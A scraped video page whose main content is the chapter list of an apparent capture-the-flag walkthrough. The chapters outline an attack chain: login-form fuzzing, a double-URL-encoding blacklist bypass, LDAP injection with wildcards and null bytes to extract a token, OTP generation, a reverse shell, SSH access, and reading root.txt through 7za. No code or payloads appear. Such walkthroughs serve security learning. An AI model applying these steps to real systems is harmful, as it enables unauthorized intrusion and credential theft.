Learn the difference between pre-training and fine-tuning in AI and how they enable models like ChatGPT to learn and answer questions effectively
Medium · AI
📰
Pre-training vs Fine-Tuning: How AI Learns Before It Learns You — Part 25
Learn how AI models like GPT and BERT learn through pre-training and fine-tuning, and why this matters for their ability to answer specific questions
Medium · Machine Learning
📰
The 8 Best AI Tools for Your Master's Thesis in 2026
Discover 8 AI tools to boost your master's thesis research in 2026, from literature search to summarization and more
Dev.to AI

Chapters (25)

0:52 Start of Recon, discovering CentOS Version via HTTPD Version
2:15 Checking out the HTTP Page
3:32 Checking out login.php
5:15 Identifying a Secure Token is used, most likely STOKEN
7:05 Failing to enumerate usernames through BruteForce
9:45 Fuzzing the login form with special characters to identify a blacklist
11:45 Trying Double URL Encoding to bypass the BlackList
12:55 Explaining Double URL Encoding
14:45 Discovering this is most likely a LDAP Injection
16:50 Explaining how a LDAP Query Works
19:15 Identifying the LDAP Query Structure with a Null Byte
20:40 Injecting the WildCard (*) to enumerate usernames
24:00 Using Wfuzz to extract the username
26:00 Enumerating LDAP Attributes that are utilized
30:26 Creating a python script to extract the Pager Attribute
41:38 Script complete, lets extract the token
43:45 Using STOKEN to generate the OTP and logging in
46:00 Disabling NTP so we can math the server time
46:44 Discovery of that second half of the original LDAP Query at 16 minutes.
47:33 Using a Null Byte to remove the GROUP Check.
50:33 Running Commands
50:25 Reverse Shell Returned
53:17 Checking for the LDAP Bind password, then SSHing into the box
55:00 Going over the /backup directory
58:20 Using ListFiles to have 7za print our the contents of root.txt
Up next
5 Levels of AI Agents - From Simple LLM Calls to Multi-Agent Systems
Dave Ebbelaar (LLM Eng)
Watch →